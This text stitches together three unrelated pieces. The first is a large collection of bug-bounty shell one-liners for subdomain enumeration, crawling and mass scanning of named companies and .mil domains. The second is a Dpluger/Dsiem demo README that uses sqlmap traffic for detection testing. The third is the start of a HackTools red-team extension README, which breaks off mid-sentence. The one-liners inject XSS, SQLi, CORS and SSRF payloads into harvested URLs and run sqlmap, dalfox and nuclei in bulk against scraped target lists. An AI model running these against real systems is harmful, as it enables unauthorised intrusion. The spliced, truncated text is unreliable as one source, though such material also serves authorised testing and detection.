Scan log4j using BBRF and log4j-scan - [Explained command](https://bit.ly/3IUivk9) ```bash bbrf domains | httpx -silent | xargs -I@ sh -c 'python3 http://log4j-scan.py -u "@"' ``` ### Airixss XSS - [Explained command](https://bit.ly/3tq5Hfv) ```bash echo testphp.vulnweb.com | waybackurls | gf xss | uro | httpx -silent | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" ``` ### FREQ XSS - [Explained command](https://bit.ly/3u8Qpeu) ```bash echo testphp.vulnweb.com | waybackurls | gf xss | uro | qsreplace '"><img src=x onerror=alert(1);>' | freq | egrep -v 'Not' ``` ### Bhedak - [Explained command](https://bit.ly/3oNisxi) ```bash cat urls | bhedak "\"><svg/onload=alert(1)>*'/---+{{7*7}}" ``` ### .bashrc shortcut OFJAAAH ```bash reconjs(){ gau -subs $1 |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> js.txt ; cat js.txt | anti-burl | awk '{print $4}' | sort -u >> AliveJs.txt } cert(){ curl -s "[https://crt.sh/?q=%.$1&output=json](https://crt.sh/?q=%25.$1&output=json)" | jq -r '.[].name_value' | sed 's/\*\.//g' | anew } anubis(){ curl -s "[https://jldc.me/anubis/subdomains/$1](https://jldc.me/anubis/subdomains/$1)" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew } ``` ### Oneliner Haklistgen - @hakluke ```bash subfinder -silent -d domain | anew subdomains.txt | httpx -silent | anew urls.txt | hakrawler | anew endpoints.txt | while read url; do curl $url --insecure | haklistgen | anew wordlist.txt; done cat subdomains.txt urls.txt endpoints.txt | haklistgen | anew wordlist.txt; ``` ### Running JavaScript on each page send to proxy. - [Explained command](https://bit.ly/3daIyFw) ```bash cat 200http | page-fetch --javascript '[...document.querySelectorAll("a")].map(n => n.href)' --proxy http://192.168.15.47:8080 ``` ### Running cariddi to Crawler - [Explained command](https://bit.ly/3hQPF8w) ```bash echo tesla.com | subfinder -silent | httpx -silent | cariddi -intensive ``` ### Dalfox scan to bugbounty targets. - [Explained command](https://bit.ly/3nnEhCj) ```bash xargs -a xss-urls.txt -I@ bash -c 'python3 /dir-to-xsstrike/xsstrike.py -u @ --fuzzer' ``` ### Dalfox scan to bugbounty targets. - [Explained command](https://bit.ly/324Sr1x) ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @ ``` ### Using x8 to Hidden parameters discovery - [Explaining command](https://bit.ly/3w48wl8) ```bash assetfinder domain | httpx -silent | sed -s 's/$/\//' | xargs -I@ sh -c 'x8 -u @ -w params.txt -o enumerate' ``` ### Extract .js Subdomains - [Explaining command](https://bit.ly/339CN5p) ```bash echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | anew JS echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1 ``` ### goop to search .git files. - [Explaining command](https://bit.ly/3d0VcY5) ```bash xargs -a xss -P10 -I@ sh -c 'goop @' ``` ### Using chaos list to enumerate endpoint ```bash curl -s https://raw.githubusercontent.com/projectdiscovery/public-bugbounty-programs/master/chaos-bugbounty-list.json | jq -r '.programs[].domains[]' | xargs -I@ sh -c 'python3 paramspider.py -d @' ``` ### Using Wingman to search XSS reflect / DOM XSS - [Explaining command](https://bit.ly/3m5ft1g) ```bash xargs -a domain -I@ sh -c 'wingman -u @ --crawl | notify' ``` ### Search ASN to metabigor and resolvers domain - [Explaining command](https://bit.ly/3bvghsY) ```bash echo 'dod' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\+\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew' ``` ### OneLiners ### Search .json gospider filter anti-burl - [Explaining command](https://bit.ly/3eoUhSb) ```bash gospider -s https://twitch.tv --js | grep -E "\.js(?:onp?)?$" | awk '{print $4}' | tr -d "[]" | anew | anti-burl ``` ### Search .json subdomain - [Explaining command](https://bit.ly/3kZydis) ```bash assetfinder http://tesla.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew ``` ### SonarDNS extract subdomains - [Explaining command](https://bit.ly/2NvXRyv) ```bash wget https://opendata.rapid7.com/sonar.fdns_v2/2021-02-26-1614298023-fdns_a.json.gz ; gunzip 2021-02-26-1614298023-fdns_a.json.gz ; cat 2021-02-26-1614298023-fdns_a.json | grep ".DOMAIN.com" | jq .name | tr '" " "' " / " | tee -a sonar ``` ### Kxss to search param XSS - [Explaining command](https://bit.ly/3aaEDHL) ```bash echo http://testphp.vulnweb.com/ | waybackurls | kxss ``` ### Recon subdomains and gau to search vuls DalFox - [Explaining command](https://bit.ly/3aMXQOF) ```bash assetfinder testphp.vulnweb.com | gau | dalfox pipe ``` ### Recon subdomains and Screenshot to URL using gowitness - [Explaining command](https://bit.ly/3aKSSCb) ```bash assetfinder -subs-only army.mil | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @' ``` ### Extract urls to source code comments - [Explaining command](https://bit.ly/2MKkOxm) ```bash cat urls1 | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]' ``` ### Axiom recon "complete" - [Explaining command](https://bit.ly/2NIavul) ```bash findomain -t domain -q -u url ; axiom-scan url -m subfinder -o subs --threads 3 ; axiom-scan subs -m httpx -o http ; axiom-scan http -m ffuf --threads 15 -o ffuf-output ; cat ffuf-output | tr "," " " | awk '{print $2}' | fff | grep 200 | sort -u ``` ### Domain subdomain extraction - [Explaining command](https://bit.ly/3c2t6eG) ```bash cat url | haktldextract -s -t 16 | tee subs.txt ; xargs -a subs.txt -I@ sh -c 'assetfinder -subs-only @ | anew | httpx -silent -threads 100 | anew httpDomain' ``` ### Search .js using - [Explaining command](https://bit.ly/362LyQF) ```bash assetfinder -subs-only DOMAIN -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | awk '{print $3}' | grep -E "\.js(?:onp?)?$" | anew ``` ### This one was huge ... But it collects .js gau + wayback + gospider and makes an analysis of the js. tools you need below. - [Explaining command](https://bit.ly/3sD0pLv) ```bash cat dominios | gau |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> gauJS.txt ; cat dominios | waybackurls | grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> waybJS.txt ; gospider -a -S dominios -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" >> gospiderJS.txt ; cat gauJS.txt waybJS.txt gospiderJS.txt | sort -u >> saidaJS ; rm -rf *.txt ; cat saidaJS | anti-burl |awk '{print $4}' | sort -u >> AliveJs.txt ; xargs -a AliveJs.txt -n 2 -I@ bash -c "echo -e '\n[URL]: @\n'; python3 linkfinder.py -i @ -o cli" ; cat AliveJs.txt | python3 collector.py output ; rush -i output/urls.txt 'python3 SecretFinder.py -i {} -o cli | sort -u >> output/resultJSPASS' ``` ### My recon automation simple. OFJAAAH.sh - [Explaining command](https://bit.ly/3nWHM22) ```bash chaos -d $1 -o chaos1 -silent ; assetfinder -subs-only $1 >> assetfinder1 ; subfinder -d $1 -o subfinder1 -silent ; cat assetfinder1 subfinder1 chaos1 >> hosts ; cat hosts | anew clearDOMAIN ; httpx -l hosts -silent -threads 100 | anew http200 ; rm -rf chaos1 assetfinder1 subfinder1 ``` ### Download all domains to bounty chaos - [Explaining command](https://bit.ly/38wPQ4o) ```bash curl https://chaos-data.projectdiscovery.io/index.json | jq -M '.[] | .URL | @sh' | xargs -I@ sh -c 'wget @ -q'; mkdir bounty ; unzip '*.zip' -d bounty/ ; rm -rf *zip ; cat bounty/*.txt >> allbounty ; sort -u allbounty >> domainsBOUNTY ; rm -rf allbounty bounty/ ; echo '@OFJAAAH' ``` ### Recon to search SSRF Test - [Explaining command](https://bit.ly/3shFFJ5) ```bash findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace http://YOUR.burpcollaborator.net ``` ### ShuffleDNS to domains in file scan nuclei. - [Explaining command](https://bit.ly/2L3YVsc) ```bash xargs -a domain -I@ -P500 sh -c 'shuffledns -d "@" -silent -w words.txt -r resolvers.txt' | httpx -silent -threads 1000 | nuclei -t /root/nuclei-templates/ -o re1 ``` ### Search Asn Amass - [Explaining command](https://bit.ly/2EMooDB) Amass intel will search the organization "paypal" from a database of ASNs at a faster-than-default rate. It will then take these ASN numbers and scan the complete ASN/IP space for all tld's in that IP space (paypal.com, paypal.co.id, paypal.me) ```bash amass intel -org paypal -max-dns-queries 2500 | awk -F, '{print $1}' ORS=',' | sed 's/,$//' | xargs -P3 -I@ -d ',' amass intel -asn @ -max-dns-queries 2500'' ``` ### SQLINJECTION Mass domain file - [Explaining command](https://bit.ly/354lYuf) ```bash httpx -l domains -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1' ``` ### Using chaos search js - [Explaining command](https://bit.ly/32vfRg7) Chaos is an API by Project Discovery that discovers subdomains. Here we are querying thier API for all known subdoains of "att.com". We are then using httpx to find which of those domains is live and hosts an HTTP or HTTPs site. We then pass those URLs to GoSpider to visit them and crawl them for all links (javascript, endpoints, etc). We then grep to find all the JS files. We pipe this all through anew so we see the output iterativlely (faster) and grep for "(http|https)://att.com" to make sure we dont recieve output for domains that are not "att.com". ```bash chaos -d att.com | httpx -silent | xargs -I@ -P20 sh -c 'gospider -a -s "@" -d 2' | grep -Eo "(http|https)://[^/"].*.js+" | sed "s#] ``` ### Search Subdomain using Gospider - [Explaining command](https://bit.ly/2QtG9do) GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) we use some blacklist, so that it doesn’t travel, not to delay, grep is a command-line utility for searching plain-text data sets for lines that match a regular expression to search HTTP and HTTPS ```bash gospider -d 0 -s "https://site.com" -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### Using gospider to chaos - [Explaining command](https://bit.ly/2D4vW3W) GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) chaos is a subdomain search project, to use it needs the api, to xargs is a command on Unix and most Unix-like operating systems used to build and execute commands from standard input. ```bash chaos -d paypal.com -bbq -filter-wildcard -http-url | xargs -I@ -P5 sh -c 'gospider -a -s "@" -d 3' ``` ### Using recon.dev and gospider crawler subdomains - [Explaining command](https://bit.ly/32pPRDa) We will use recon.dev api to extract ready subdomains infos, then parsing output json with jq, replacing with a Stream EDitor all blank spaces If anew, we can sort and display unique domains on screen, redirecting this output list to httpx to create a new list with just alive domains. Xargs is being used to deal with gospider with 3 parallel proccess and then using grep within regexp just taking http urls. ```bash curl "https://recon.dev/api/search?key=apiKEY&domain=paypal.com" |jq -r '.[].rawDomains[]' | sed 's/ //g' | anew |httpx -silent | xargs -P3 -I@ gospider -d 0 -s @ -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### PSQL - search subdomain using cert.sh - [Explaining command](https://bit.ly/32rMA6e) Make use of pgsql cli of crt.sh, replace all comma to new lines and grep just twitch text domains with anew to confirm unique outputs ```bash psql -A -F , -f querycrt -h http://crt.sh -p 5432 -U guest certwatch 2>/dev/null | tr ', ' '\n' | grep twitch | anew ``` ### Search subdomains using github and httpx - [Github-search](https://github.com/gwen001/github-search) Using python3 to search subdomains, httpx filter hosts by up status-code response (200) ```python ./github-subdomains.py -t APYKEYGITHUB -d domaintosearch | httpx --title ``` ### Search SQLINJECTION using qsreplace search syntax error - [Explained command](https://bit.ly/3hxFWS2) ```bash grep "=" .txt| qsreplace "' OR '1" | httpx -silent -store-response-dir output -threads 100 | grep -q -rn "syntax\|mysql" output 2>/dev/null && \printf "TARGET \033[0;32mCould Be Exploitable\e[m\n" || printf "TARGET \033[0;31mNot Vulnerable\e[m\n" ``` ### Search subdomains using jldc - [Explained command](https://bit.ly/2YBlEjm) ```bash curl -s "https://jldc.me/anubis/subdomains/att.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew ``` ### Search subdomains in assetfinder using hakrawler spider to search links in content responses - [Explained command](https://bit.ly/3hxRvZw) ```bash assetfinder -subs-only tesla.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | grep "tesla" ``` ### Search subdomains in cert.sh - [Explained command](https://bit.ly/2QrvMXl) ```bash curl -s "https://crt.sh/?q=%25.att.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | httpx -title -silent | anew ``` ### Search subdomains in cert.sh assetfinder to search in link /.git/HEAD - [Explained command](https://bit.ly/3lhFcTH) ```bash curl -s "https://crt.sh/?q=%25.tesla.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ```bash curl -s "https://crt.sh/?q=%25.enjoei.com.br&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | httpx -silent -path /.git/HEAD -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Collect js files from hosts up by gospider - [Explained command](https://bit.ly/3aWIwyI) ```bash xargs -P 500 -a pay -I@ sh -c 'nc -w1 -z -v @ 443 2>/dev/null && echo @' | xargs -I@ -P10 sh -c 'gospider -a -s "https://@" -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" | anew' ``` ### Subdomain search Bufferover resolving domain to httpx - [Explained command](https://bit.ly/3lno9j0) ```bash curl -s https://dns.bufferover.run/dns?q=.sony.com |jq -r .FDNS_A[] | sed -s 's/,/\n/g' | httpx -silent | anew ``` ### Using gargs to gospider search with parallel proccess - [Gargs](https://github.com/brentp/gargs) - [Explained command](https://bit.ly/2EHj1FD) ```bash httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -l domain -timeout 5 -threads 200 --follow-redirects -silent | gargs -p 3 'gospider -m 5 --blacklist pdf -t 2 -c 300 -d 5 -a -s {}' | anew stepOne ``` ### Injection xss using qsreplace to urls filter to gospider - [Explained command](https://bit.ly/3joryw9) ```bash gospider -S domain.txt -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>' ``` ### Extract URL's to apk - [Explained command](https://bit.ly/2QzXwJr) ```bash apktool d app.apk -o uberApk;grep -Phro "(https?://)[\w\.-/]+[\"'\`]" uberApk/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemas.android\|google\|goo.gl" ``` ### Chaos to Gospider - [Explained command](https://bit.ly/3gFJbpB) ```bash chaos -d att.com -o att -silent | httpx -silent | xargs -P100 -I@ gospider -c 30 -t 15 -d 4 -a -H "x-forwarded-for: 127.0.0.1" -H "User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" -s @ ``` ### Checking invalid certificate - [Real script](https://bit.ly/2DhAwMo) - [Script King](https://bit.ly/34Z0kIH) ```bash xargs -a domain -P1000 -I@ sh -c 'bash cert.sh @ 2> /dev/null' | grep "EXPIRED" | awk '/domain/{print $5}' | httpx ``` ### Using shodan & Nuclei - [Explained command](https://bit.ly/3jslKle) Shodan is a search engine that lets the user find specific types of computers connected to the internet, AWK Cuts the text and prints the third column. httpx is a fast and multi-purpose HTTP using -silent. Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use, You need to download the nuclei templates. ```bash shodan domain DOMAIN TO BOUNTY | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ ``` ### Open Redirect test using gf. - [Explained command](https://bit.ly/3hL263x) echo is a command that outputs the strings it is being passed as arguments. What to Waybackurls? Accept line-delimited domains on stdin, fetch known URLs from the Wayback Machine for .domain.com and output them on stdout. Httpx? is a fast and multi-purpose HTTP. GF? A wrapper around grep to avoid typing common patterns and anew Append lines from stdin to a file, but only if they don't already appear in the file. Outputs new lines to stdout too, removes duplicates. ```bash echo "domain" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew ``` ### Using shodan to jaeles "How did I find a critical today? well as i said it was very simple, using shodan and jaeles". - [Explained command](https://bit.ly/2QQfY0l) ```bash shodan domain domain| awk '{print $3}'| httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using Chaos to jaeles "How did I find a critical today?. - [Explained command](https://bit.ly/2YXiK8N) To chaos this project to projectdiscovery, Recon subdomains, using httpx, if we see the output from chaos domain.com we need it to be treated as http or https, so we use httpx to get the results. We use anew, a tool that removes duplicates from @TomNomNom, to get the output treated for import into jaeles, where he will scan using his templates. ```bash chaos -d domain | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using shodan to jaeles - [Explained command](https://bit.ly/2Dkmycu) ```bash domain="domaintotest";shodan domain $domain | awk -v domain="$domain" '{print $1"."domain}'| httpx -threads 300 | anew shodanHostsUp | xargs -I@ -P3 sh -c 'jaeles -c 300 scan -s jaeles-signatures/ -u @'| anew JaelesShodanHosts ``` ### Search to files using assetfinder and ffuf - [Explained command](https://bit.ly/2Go3Ba4) ```bash assetfinder att.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w path.txt -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"' ``` ### HTTPX using new mode location and injection XSS using qsreplace. - [Explained command](https://bit.ly/2Go3Ba4) ```bash httpx -l master.txt -silent -no-color -threads 300 -location 301,302 | awk '{print $2}' | grep -Eo '(http|https)://[^/"].*' | tr -d '[]' | anew | xargs -I@ sh -c 'gospider -d 0 -s @' | tr ' ' '\n' | grep -Eo '(http|https)://[^/"].*' | grep "=" | qsreplace "<svg onload=alert(1)>" "' ``` ### Grap internal juicy paths and do requests to them. - [Explained command](https://bit.ly/357b1IY) ```bash export domain="https://target";gospider -s $domain -d 3 -c 300 | awk '/linkfinder/{print $NF}' | grep -v "http" | grep -v "http" | unfurl paths | anew | xargs -I@ -P50 sh -c 'echo $domain@ | httpx -silent -content-length' ``` ### Download to list bounty targets We inject using the sed .git/HEAD command at the end of each url. - [Explained command](https://bit.ly/2R2gNn5) ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv | cat domains.txt | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Using to findomain to SQLINJECTION. - [Explained command](https://bit.ly/2ZeAhcF) ```bash findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1 ``` ### Jaeles scan to bugbounty targets. - [Explained command](https://bit.ly/3jXbTnU) ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ jaeles scan -s /jaeles-signatures/ -u @ ``` ### JLDC domain search subdomain, using rush and jaeles. - [Explained command](https://bit.ly/3hfNV5k) ```bash curl -s "https://jldc.me/anubis/subdomains/sony.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | httpx -silent -threads 300 | anew | rush -j 10 'jaeles scan -s /jaeles-signatures/ -u {}' ``` ### Chaos to search subdomains check cloudflareip scan port. - [Explained command](https://bit.ly/3hfNV5k) ```bash chaos -silent -d paypal.com | filter-resolved | cf-check | anew | naabu -rate 60000 -silent -verify | httpx -title -silent ``` ### Search JS to domains file. - [Explained command](https://bit.ly/2Zs13yj) ```bash cat FILE TO TARGET | httpx -silent | subjs | anew ``` ### Search JS using assetfinder, rush and hakrawler. - [Explained command](https://bit.ly/3ioYuV0) ```bash assetfinder -subs-only paypal.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | rush 'hakrawler -plain -linkfinder -depth 5 -url {}' | grep "paypal" ``` ### Search to CORS using assetfinder and rush - [Explained command](https://bit.ly/33qT71x) ```bash assetfinder fitbit.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin:evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n\033[0;32m[VUL TO CORS] - {}\e[m"' ``` ### Search to js using hakrawler and rush & unew - [Explained command](https://bit.ly/2Rqn9gn) ```bash cat hostsGospider | rush -j 100 'hakrawler -js -plain -usewayback -depth 6 -scope subs -url {} | unew hakrawlerHttpx' ``` ### XARGS to dirsearch brute force. - [Explained command](https://bit.ly/32MZfCa) ```bash cat hosts | xargs -I@ sh -c 'python3 dirsearch.py -r -b -w path -u @ -i 200, 403, 401, 302 -e php,html,json,aspx,sql,asp,js' ``` ### Assetfinder to run massdns. - [Explained command](https://bit.ly/32T5W5O) ```bash assetfinder DOMAIN --subs-only | anew | massdns -r lists/resolvers.txt -t A -o S -w result.txt ; cat result.txt | sed 's/A.*//; s/CN.*// ; s/\..$//' | httpx -silent ``` ### Extract path to js - [Explained command](https://bit.ly/3icrr5R) ```bash cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u ``` ### Find subdomains and Secrets with jsubfinder - [Explained command](https://bit.ly/3dvP6xq) ```bash cat subdomsains.txt | httpx --silent | jsubfinder search -s ``` ### Search domains to Range-IPS. - [Explained command](https://bit.ly/3fa0eAO) ```bash cat dod1 | awk '{print $1}' | xargs -I@ sh -c 'prips @ | hakrevdns -r 1.1.1.1' | awk '{print $2}' | sed -r 's/.$//g' | httpx -silent -timeout 25 | anew ``` ### Search new's domains using dnsgen. - [Explained command](https://bit.ly/3kNTHNm) ```bash xargs -a army1 -I@ sh -c 'echo @' | dnsgen - | httpx -silent -threads 10000 | anew newdomain ``` ### List ips, domain extract, using amass + wordlist - [Explained command](https://bit.ly/2JpRsmS) ```bash amass enum -src -ip -active -brute -d navy.mil -o domain ; cat domain | cut -d']' -f 2 | awk '{print $1}' | sort -u > hosts-amass.txt ; cat domain | cut -d']' -f2 | awk '{print $2}' | tr ',' '\n' | sort -u > ips-amass.txt ; curl -s "https://crt.sh/?q=%.navy.mil&output=json" | jq '.[].name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u > hosts-crtsh.txt ; sed 's/$/.navy.mil/' dns-Jhaddix.txt_cleaned > hosts-wordlist.txt ; cat hosts-amass.txt hosts-crtsh.txt hosts-wordlist.txt | sort -u > hosts-all.txt ``` ### Search domains using amass and search vul to nuclei. - [Explained command](https://bit.ly/3gsbzNt) ```bash amass enum -passive -norecursive -d disa.mil -o domain ; httpx -l domain -silent -threads 10 | nuclei -t PATH -o result -timeout 30 ``` ### Verify to cert using openssl. - [Explained command](https://bit.ly/37avq0C) ```bash sed -ne 's/^\( *\)Subject:/\1/p;/X509v3 Subject Alternative Name/{ N;s/^.*\n//;:a;s/^\( *\)\(.*\), /\1\2\n\1/;ta;p;q; }' < <( openssl x509 -noout -text -in <( openssl s_client -ign_eof 2>/dev/null <<<$'HEAD / HTTP/1.0\r\n\r' \ -connect hackerone.com:443 ) ) ``` ### Search domains using openssl to cert. - [Explained command](https://bit.ly/3m9AsOY) ```bash xargs -a recursivedomain -P50 -I@ sh -c 'openssl s_client -connect @:443 2>&1 '| sed -E -e 's/[[:blank:]]+/\n/g' | httpx -silent -threads 1000 | anew ``` ### Search to Hackers. - [Censys](https://censys.io) - [Spyce](https://spyce.com) - [Shodan](https://shodan.io) - [Viz Grey](https://viz.greynoise.io) - [Zoomeye](https://zoomeye.org) - [Onyphe](https://onyphe.io) - [Wigle](https://wigle.net) - [Intelx](https://intelx.io) - [Fofa](https://fofa.so) - [Hunter](https://hunter.io) - [Zorexeye](https://zorexeye.com) - [Pulsedive](https://pulsedive.com) - [Netograph](https://netograph.io) - [Vigilante](https://vigilante.pw) - [Pipl](https://pipl.com) - [Abuse](https://abuse.ch) - [Cert-sh](https://cert.sh) - [Maltiverse](https://maltiverse.com/search) - [Insecam](https://insecam.org) - [Anubis](https://https://jldc.me/anubis/subdomains/att.com) - [Dns Dumpster](https://dnsdumpster.com) - [PhoneBook](https://phonebook.cz) - [Inquest](https://labs.inquest.net) - [Scylla](https://scylla.sh) # Project [![made-with-Go](https://img.shields.io/badge/Made%20with-Go-1f425f.svg)](http://golang.org) [![made-with-bash](https://img.shields.io/badge/Made%20with-Bash-1f425f.svg)](https://www.gnu.org/software/bash/) [![Open Source? Yes!](https://badgen.net/badge/Open%20Source%20%3F/Yes%21/blue?icon=github)](https://github.com/Naereen/badges/) [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/KingOfTipsBugBounty) <a href="https://www.buymeacoffee.com/OFJAAAH" target="_blank"><img src="https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png" alt="Buy Me A Coffee" style="height: 20px !important;width: 50px !important;box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;-webkit-box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;" ></a>
# Dpluger tool demo This page illustrates how to use `dpluger` to generate Dsiem directives using a `dpluger_config.json` configured for suricata index. The same workflow can be used for other indices too. ## Steps First generate attack traffic to populate suricata index. Do something like this from a remote machine: ```shell $ sqlmap --batch -u http://[targetip]:8081/cgi-bin/ ``` Generate `suricata_plugin-sids.tsv` using the following command (will also generate Logstash config for suricata, but that's already done beforehand in the demo env.): ```shell $ dpluger run ``` Create suricata directive file based on that: ```shell $ dpluger directive -f suricata_plugin-sids.tsv ``` Activate those directives in dsiem: ```shell $ cp directives_dsiem.json ../docker/conf/dsiem/configs/directives_dsiem.json $ docker restart dsiem ``` Now trigger the same attack as before (e.g. sqlmap, etc.), and notice how Dsiem web UI and Kibana dashboard will now display new alarms based on those directives. The commands above starting from `dpluger run` can be repeated as needed to add more directives as more types of events occur in the source (suricata) index.
<div align="center"> <img alt="logo_hack_tools" src="https://i.postimg.cc/GtLdZ2rZ/noun-Panama-hat-1454601.png" /> <h1>Welcome to HackTools 🛠</h1> <p> <img alt="Version" src="https://img.shields.io/badge/version-0.5.0-blue.svg?cacheSeconds=2592000&style=for-the-badge" /> <a href="https://addons.mozilla.org/en-US/firefox/addon/hacktools" target="_blank"> <img alt="mozilla" src="https://img.shields.io/badge/Firefox-FF7139?style=for-the-badge&logo=Firefox-Browser&logoColor=white" /> </a> <a href="https://chrome.google.com/webstore/detail/hack-tools/cmbndhnoonmghfofefkcccljbkdpamhi?hl=en" target="_blank"> <img alt="chrome-extension" src="https://img.shields.io/badge/Google%20Chrome-4285F4?style=for-the-badge&logo=GoogleChrome&logoColor=white" /> </a> <a href="https://github.com/LasCC/Hack-Tools/issues/88" target="_blank"> <img alt="safari-extension" src="https://img.shields.io/badge/Safari-000000?style=for-the-badge&logo=Safari&logoColor=white" /> </a> <img alt="Downloads" src="https://img.shields.io/github/downloads/LasCC/Hack-Tools/total.svg?style=for-the-badge" /> <a href="https://inventory.raw.pm/" target="_blank"> <img alt="RawSecInventory" src="https://inventory.raw.pm/img/badges/Rawsec-inventoried-FF5050_for-the-badge.svg" /> <a/> </p> <p align="center"> <a href="#the-all-in-one-red-team-browser-extension-for-web-pentesters"><b>Introduction</b></a> &nbsp;&nbsp;&mdash;&nbsp;&nbsp; <a href="#preview"><b>Preview</b></a> &nbsp;&nbsp;&mdash;&nbsp;&nbsp; <a href="#install-the-extension"><b>Install</b></a> &nbsp;&nbsp;&mdash;&nbsp;&nbsp; <a href="#build-from-source-code"><b>Build</b></a> &nbsp;&nbsp;&mdash;&nbsp;&nbsp; <a href="#show-your-support"><b>Support</b></a> </p> </div> ### The all-in-one Red Team browser extension for **Web Pentesters** HackTools, is a web extension facilitating your **web application penetration tests**, it includes **cheat sheets** as well as all the **tools** used during a test such as XSS payloads, Reverse shells and much more. With the extension you **no longer need to search for payloads in different websites** or in your local storage space, most of the tools are accessible in one click. HackTools is accessible either in **pop up mode** or in a whole tab in the **Devtools** part of the browser with F12. ### Current functions - Dynamic Reverse Shell generator (PHP, Bash, Ruby, Python, Perl, Netcat) - Shell Spawning (TTY Shell Spawning) - MSF Venom Builder - XSS Payloads - Basic SQLi payloads - Local file inclusion payloads (LFI) - Data Encoding - Obfuscated Files or Information - Hash Generator (MD5, SHA1, SHA256, SHA512, SM3) - Useful Linux commands (Port Forwarding, SUID) - RSS Feed (Exploit DB, Cisco Security Advisories, CXSECURITY) - CVE Search Engine - Various method of data exfiltration and download from a remote machine ## Preview <div align='center'> <img alt="preview_1" src="./src/assets/img/preview.gif?raw=true" /> </div> <div align='center'> <img alt="preview_2" src="https://i.imgur.com/74AJxmX.png" /> </div> <div align='center'> <img alt="preview_3" src="https://i.imgur.com/syUdtLS.png" /> </div> <div align='center'> <img alt="preview_4" src="https://i.imgur.com/sGiP3CZ.png" /> </div> <div align='center'> <img alt="preview_5" src="https://i.imgur.com/63xoeVN.png" /> </div> # Install the extension <h2> <img src="https://raw.githubusercontent.com/edent/SuperTinyIcons/master/images/svg/chromium.svg" alt="chromium_icon" title='Chromium' width="25" height="25" style="float:left;" /> Chromium based browser </h2> You can download the **latest build** [here.](https://github.com/LasCC/Hack-Tools/releases) Or, you can download the extension on the **chrome web 